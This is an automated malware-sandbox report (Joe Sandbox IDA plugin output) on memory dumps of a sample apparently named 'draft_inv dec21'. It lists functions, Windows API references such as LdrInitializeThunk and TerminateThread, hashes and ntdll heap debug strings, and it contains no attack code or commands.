Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2c04b6a548bb081448583b27eb85d4f77c3361fc09572b050241ba3206bcd828
Instruction ID: c229757afbc08cb861b9a433bf2d4646d3d44038f2b20d48e84fc0771fe3f22a
Opcode Fuzzy Hash: 2c04b6a548bb081448583b27eb85d4f77c3361fc09572b050241ba3206bcd828
Instruction Fuzzy Hash: 49900231701500424550B169894494A80596BE17117D1C629A4A8CD10DC56988656A65

Uniqueness

Uniqueness Score: -1.00%

Function 1E8F2E50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E8F2E5A

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 973e47f33a5af327bb4c05ef00d0f000f8761aa20ca0ed193a5b50d92bb5ea3e
Instruction ID: 6f410dffa3302cff3b83860d36e2fcec3011bcfaab951589bf0e5c1d7217709f
Opcode Fuzzy Hash: 973e47f33a5af327bb4c05ef00d0f000f8761aa20ca0ed193a5b50d92bb5ea3e
Instruction Fuzzy Hash: E990027134150442D510A1594514B4A405987E1701FD1C51DE5158D14DC629CC527526

Uniqueness

Uniqueness Score: -1.00%

Function 1E8F2F00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E8F2F0A

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: faf1d9b54e5bc383c84c6af35ed9f3dccb39e4457b13183b0da15d0d48a407fc
Instruction ID: 01c156506c63684d655ef95a2344770b306a3f6baed16c291f0652bbf7a8a76e
Opcode Fuzzy Hash: faf1d9b54e5bc383c84c6af35ed9f3dccb39e4457b13183b0da15d0d48a407fc
Instruction Fuzzy Hash: ED900231311D0042D610A5694D14B4B405947D0703FD1C61DA4248D14CC92588616921

Uniqueness

Uniqueness Score: -1.00%

Function 1E8F2CF0, Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1E8F2CFA

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 17edecefd54734d167448389fdb318cc658beaefaf543e2b71372a2d53da04d1
Instruction ID: 487471a6aa0da6216f5802d91d96a7235c37ea1fa1e6975287abdd5d52ff4823
Opcode Fuzzy Hash: 17edecefd54734d167448389fdb318cc658beaefaf543e2b71372a2d53da04d1
Instruction Fuzzy Hash: 74900231342541525955F159450454B805A57E07417D1C51AA5508D10CC5369856EA21

Uniqueness

Uniqueness Score: -1.00%

Function 1E8F2C30, Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1E8F2C3A

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 671ccd263b5ffefbfcc9a5ead14c9d9c8fd07af57e899fce6f169a342502d5af
Instruction ID: bb4cbd1612fd5ac574f34cc7a06d1ac11a8a4f528c958516ec854e2d6fc9a057
Opcode Fuzzy Hash: 671ccd263b5ffefbfcc9a5ead14c9d9c8fd07af57e899fce6f169a342502d5af
Instruction Fuzzy Hash: 7890023931350002D590B159550864E405947D1702FD1D91DA4109D18CC92588696721

Uniqueness

Uniqueness Score: -1.00%

Function 1E8F2C50, Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1E8F2C5A

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fd111e0d5c6899b638d861eb73e24331fa0c4868ec45f533a6f0ef9498ffd671
Instruction ID: d55a515f6fbb46975e65e5835f1dd5dfb036f9df2c0e545818e71064b9493f31
Opcode Fuzzy Hash: fd111e0d5c6899b638d861eb73e24331fa0c4868ec45f533a6f0ef9498ffd671
Instruction Fuzzy Hash: D190023130150003D550B159551864A805997E1701FD1D519E4508D14CD92588566622

Uniqueness

Uniqueness Score: -1.00%

Function 1E8F2DA0, Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1E8F2DAA

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f39449a53a306ce0b5b16df625fc2725053d6a70473c4affe51e80c2c9ba2aab
Instruction ID: 17d2f67468216d21e81c1212b8b60dd1727531c03e49455f0fcf2f87df75c001
Opcode Fuzzy Hash: f39449a53a306ce0b5b16df625fc2725053d6a70473c4affe51e80c2c9ba2aab
Instruction Fuzzy Hash: BA90023170150502D511B159450465A405E47D0741FD1C52AA5118D15ECA358992B531

Uniqueness

Uniqueness Score: -1.00%

Function 1E8F2DC0, Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1E8F2DCA

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4339855833ae9a72e1ec4cd86917d8494a208997666b0cbc3e957413a2c91144
Instruction ID: a00baf8296fbb468db3daf362860aa2f7f1454433f10f95d11190ab9ac975d69
Opcode Fuzzy Hash: 4339855833ae9a72e1ec4cd86917d8494a208997666b0cbc3e957413a2c91144
Instruction Fuzzy Hash: 1990027130150402D550B159450478A405947D0701FD1C519A9158D14EC6698DD57A65

Uniqueness

Uniqueness Score: -1.00%

Function 1E8F2D10, Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1E8F2D1A

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4f56a682ad560840110673896e448377564de0e34f665648faa3ae3741ccd763
Instruction ID: bb6a4024f2017a34cfc1f4814ae16b068fc93babc8f020a9c9338f631b269f39
Opcode Fuzzy Hash: 4f56a682ad560840110673896e448377564de0e34f665648faa3ae3741ccd763
Instruction Fuzzy Hash: 0D90023130150413D521A159460474B405D47D0741FD1C91AA4518D18DD6668952B521

Uniqueness

Uniqueness Score: -1.00%

Function 1E8F2B90, Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1E8F2B9A

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 62a89901bd5ef94a477ef41a0480d441addb9eac5abcc3e61ab8151bc2152d1e
Instruction ID: 4b742aeb5026e91c5a9a33e210505aa15ab5721915a6c4c57b21e789e4e78218
Opcode Fuzzy Hash: 62a89901bd5ef94a477ef41a0480d441addb9eac5abcc3e61ab8151bc2152d1e
Instruction Fuzzy Hash: A290023130158802D520A159850478E405947D0701FD5C919A8518E18DC6A588917521

Uniqueness

Uniqueness Score: -1.00%

Function 1E8F2BC0, Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1E8F2BCA

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1c8faafa5530f8ab9c7cd49f9753aa36ac2935f79125354e30b8f58155ed492d
Instruction ID: 7c2180952b4588369f620d5a3051feb48126f6e40b79377f9a824dd0cc8ebc35
Opcode Fuzzy Hash: 1c8faafa5530f8ab9c7cd49f9753aa36ac2935f79125354e30b8f58155ed492d
Instruction Fuzzy Hash: 2090023130150402D510A599550868A405947E0701FD1D519A9118D15EC67588917531

Uniqueness

Uniqueness Score: -1.00%

Function 1E8F2B10, Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1E8F2B1A

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 629af5c28d662c45297ec51d1e3899e15beac3e2919642994bc381a061601928
Instruction ID: b1c29bfbe79d8c591d80c50f712eb090dd4a7910186f19a6a26d8553c4164bc6
Opcode Fuzzy Hash: 629af5c28d662c45297ec51d1e3899e15beac3e2919642994bc381a061601928
Instruction Fuzzy Hash: F990023130150802D590B159450468E405947D1701FD1C51DA4119E14DCA258A597BA1

Uniqueness

Uniqueness Score: -1.00%

Function 1E8F29F0, Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1E8F29FA

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 766ae6bffc3112461a712c6e116a46ae97ac8276ffb42eb09fcdab8483fc5b4e
Instruction ID: ce9b4d30fc8f4c67f696228a57aeeb86a86fd102de52df3d6b7a77a6e3234016
Opcode Fuzzy Hash: 766ae6bffc3112461a712c6e116a46ae97ac8276ffb42eb09fcdab8483fc5b4e
Instruction Fuzzy Hash: DA900235311500030515E559070454B409A47D57513D1C529F5109D10CD63188616521

Uniqueness

Uniqueness Score: -1.00%

Function 1E8F34E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E8F34EA

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b73b196f8d6b195a16686c31ff40ee3613791950e5312dbcce9f553fb39e7532
Instruction ID: 3913ffb1fe9d8d599cac7747ae93cb5086c55f435a4f89ac06b1f09a5a83deed
Opcode Fuzzy Hash: b73b196f8d6b195a16686c31ff40ee3613791950e5312dbcce9f553fb39e7532
Instruction Fuzzy Hash: 3290023170560402D510A159461474A505947D0701FE1C919A4518D28DC7A5895179A2

Uniqueness

Uniqueness Score: -1.00%

Function 00573714, Relevance: 1.6, APIs: 1, Instructions: 146
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32 ref: 005737B3

Memory Dump Source

Source File: 00000008.00000002.6919463754.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_573000_draft_inv dec21.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 1100c33ef8370070a9697ef9f4633592ddf2cad11e61650a8586cc90d322e9f7
Instruction ID: 2eec22b1a276f0b5d03bb12156f5c5336bd280ca13404783150c4768543db229
Opcode Fuzzy Hash: 1100c33ef8370070a9697ef9f4633592ddf2cad11e61650a8586cc90d322e9f7
Instruction Fuzzy Hash: DA417D70A18212DFDF30CE2494D6BA53BA2FF17370F28C169C95A4B1A1E7719585FB42

Uniqueness

Uniqueness Score: -1.00%

Function 005736C1, Relevance: 1.6, APIs: 1, Instructions: 146
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32 ref: 005737B3

Memory Dump Source

Source File: 00000008.00000002.6919463754.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_573000_draft_inv dec21.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 03cbe881f06376ea6b420aee6928bd3df04b32306c9e760c43e5118b2f484454
Instruction ID: 2598496dad607f1df02038533318907905020dbd40726a95b518535cfba377c0
Opcode Fuzzy Hash: 03cbe881f06376ea6b420aee6928bd3df04b32306c9e760c43e5118b2f484454
Instruction Fuzzy Hash: F44170747143128FDB208E2895A57F63BA3BF12370F19C16ACC9A471A5D77589C5EB02

Uniqueness

Uniqueness Score: -1.00%

Function 005737C9, Relevance: 1.6, APIs: 1, Instructions: 126
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32 ref: 005737B3

Memory Dump Source

Source File: 00000008.00000002.6919463754.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_573000_draft_inv dec21.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 7f63336080d778c3a38d940461ee9b137df41ffeb0126ec7804fa157a9a01e4f
Instruction ID: 1b94cc65179b7b411429b5b3056362091bf1895c555f0eb2d6177fe9ace5c0df
Opcode Fuzzy Hash: 7f63336080d778c3a38d940461ee9b137df41ffeb0126ec7804fa157a9a01e4f
Instruction Fuzzy Hash: 75415FB0A08211DFDF34CE24A096BA13B91FF57370F1D8269C95A4B061EB7196C5FB42

Uniqueness

Uniqueness Score: -1.00%

Function 005736DC, Relevance: 1.6, APIs: 1, Instructions: 110
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32 ref: 005737B3

Memory Dump Source

Source File: 00000008.00000002.6919463754.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_573000_draft_inv dec21.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 747135d5d74382253f8d57b64d85182792add5b74baaa2ae4316c69f72675b03
Instruction ID: 5e4c9558ece37b9779963c0a4456671b1f9b7fb4b38cb1c664c1b2406665ee58
Opcode Fuzzy Hash: 747135d5d74382253f8d57b64d85182792add5b74baaa2ae4316c69f72675b03
Instruction Fuzzy Hash: 67314970704202DFEB308E6494A67B53BA3BF52370F18C25AC95A0B1A5D77189C5FB02

Uniqueness

Uniqueness Score: -1.00%

Function 1E8F2B2A, Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1E8F2B44

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f7826e858ca1f3195d9b112b58a1f64a87ef3b72ce635aaa4abc96c06aea18fd
Instruction ID: 0526cdf0536bf8354c8339042182d7e75aed50185f2fbedb0ad8df34d479ccf0
Opcode Fuzzy Hash: f7826e858ca1f3195d9b112b58a1f64a87ef3b72ce635aaa4abc96c06aea18fd
Instruction Fuzzy Hash: 77B02B319014C1C5D600D720070870B790467C0B01F51C115D1020A00EC338C090F231

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1E95FDF4, Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E95FE28

Strings

Invalid allocation size - %Ix (exceeded %Ix), xrefs: 1E96026A
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 1E960053
Just reallocated block at %p to %Ix bytes, xrefs: 1E960171
RtlReAllocateHeap, xrefs: 1E95FE3F, 1E95FEE2
HEAP: , xrefs: 1E95FF26, 1E960035, 1E96015D, 1E960202, 1E960259
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 1E96021F
HEAP[%wZ]: , xrefs: 1E95FF19, 1E960028, 1E960150, 1E9601F5, 1E96024C
About to reallocate block at %p to %Ix bytes, xrefs: 1E95FF3A

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 3446177414-1700792311
Opcode ID: 0af8edec5393ccbb994a6fa1d6aafb7640d0cf89052f3e08e6b32a6d259a23f6
Instruction ID: 2c0afd6589bc538a8f1c5e1512e9740959f9036e46fc9fb43d9b47aa75b8d8d2
Opcode Fuzzy Hash: 0af8edec5393ccbb994a6fa1d6aafb7640d0cf89052f3e08e6b32a6d259a23f6
Instruction Fuzzy Hash: 4DD1F335504685DFCB22CFA8C490AADBBF6FF89310F048A5EE8459B752D735A981CF10

Uniqueness

Uniqueness Score: -1.00%

Function 1E8DDA20, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E91F41B

Strings

, passed to %s, xrefs: 1E91F46C
Invalid heap signature for heap at %p, xrefs: 1E91F45D
HEAP: , xrefs: 1E91F451
RtlUnlockHeap, xrefs: 1E91F467
HEAP[%wZ]: , xrefs: 1E91F444

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
API String ID: 3446177414-3224558752
Opcode ID: b10a4a09f937279abed18b2da23fff095e618d6ad8f6b53dae843c8896c4aad7
Instruction ID: ebe54a65b87e4b381568a7d8354f6c8a3860a487e46677da6f5bb182b6f66092
Opcode Fuzzy Hash: b10a4a09f937279abed18b2da23fff095e618d6ad8f6b53dae843c8896c4aad7
Instruction Fuzzy Hash: 31413635954789DFC722DF28C494B99B3A9FF40320F048B6DE8168B3C1C738A984CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1E8DDAC0, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E91F561

Strings

RtlLockHeap, xrefs: 1E91F5AD
, passed to %s, xrefs: 1E91F5B2
Invalid heap signature for heap at %p, xrefs: 1E91F5A3
HEAP: , xrefs: 1E91F597
HEAP[%wZ]: , xrefs: 1E91F58A

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
API String ID: 3446177414-1222099010
Opcode ID: 86936b012511a38ad7d06f19cadea97447cc5cd2f91babb9721754840e30578c
Instruction ID: f19bd5dd62c6fc0db5f8b261023cc16b33072bd5ccbde0271516257a4cb5ed45
Opcode Fuzzy Hash: 86936b012511a38ad7d06f19cadea97447cc5cd2f91babb9721754840e30578c
Instruction Fuzzy Hash: 6D3100355147CCDFD722CF28C858FA97BA9FF01768F044B99E8028B791C779A988CA11

Uniqueness

Uniqueness Score: -1.00%

Function 1E8E4C3D, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E8E4C84

Strings

LdrpFindDllActivationContext, xrefs: 1E923440, 1E92346C
Querying the active activation context failed with status 0x%08lx, xrefs: 1E923466
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1E923439
minkernel\ntdll\ldrsnap.c, xrefs: 1E92344A, 1E923476

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: 9db3e8ac34cd91deae3a5aa1e180387fdb2a13e1e14ae253c850780dde7b558a
Instruction ID: e00536071bbb5710b84bcc47732331ff08f497dee7669940f19939fee1637492
Opcode Fuzzy Hash: 9db3e8ac34cd91deae3a5aa1e180387fdb2a13e1e14ae253c850780dde7b558a
Instruction Fuzzy Hash: 3D314E72E00297AFDB12DB1C889AA59B2A5FF83354F42832AD90D57EC4D7709D80C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 1E8C0680, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 1E914ED7
HEAP: , xrefs: 1E914ECA
HEAP[%wZ]: , xrefs: 1E914EBB

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 88da66ffb26acf61d7442b21fff1a321b7c1c718d73947058aa74cdc301fd89e
Instruction ID: 8ad0d6fb811714eca10da0fc7248ad4eace876b97c163c49f6ccbaad1d8db7a4
Opcode Fuzzy Hash: 88da66ffb26acf61d7442b21fff1a321b7c1c718d73947058aa74cdc301fd89e
Instruction Fuzzy Hash: 3CF1BE74A0064ADFDB05CF69C890BAAB7B6FF86740F14866DE4159B381D734E982CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1E8D0AEB, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E8D0BFC

Strings

minkernel\ntdll\ldrinit.c, xrefs: 1E919F2E
Failed to allocated memory for shimmed module list, xrefs: 1E919F1C
LdrpCheckModule, xrefs: 1E919F24

Memory Dump Source

Source File: 00000008.00000002.6930162920.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 00000008.00000002.6931777529.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.6931812481.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e880000_draft_inv dec21.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-161242083
Opcode ID: 3c732b401bb2a524721acff42251abf68d39b7af26a8861e391dfbef9151fd81
Instruction ID: 85b598013651d358d2448a25c393deb2f12dab150e90cba5ac757a0000a11a65
Opcode Fuzzy Hash: 3c732b401bb2a524721acff42251abf68d39b7af26a8861e391dfbef9151fd81
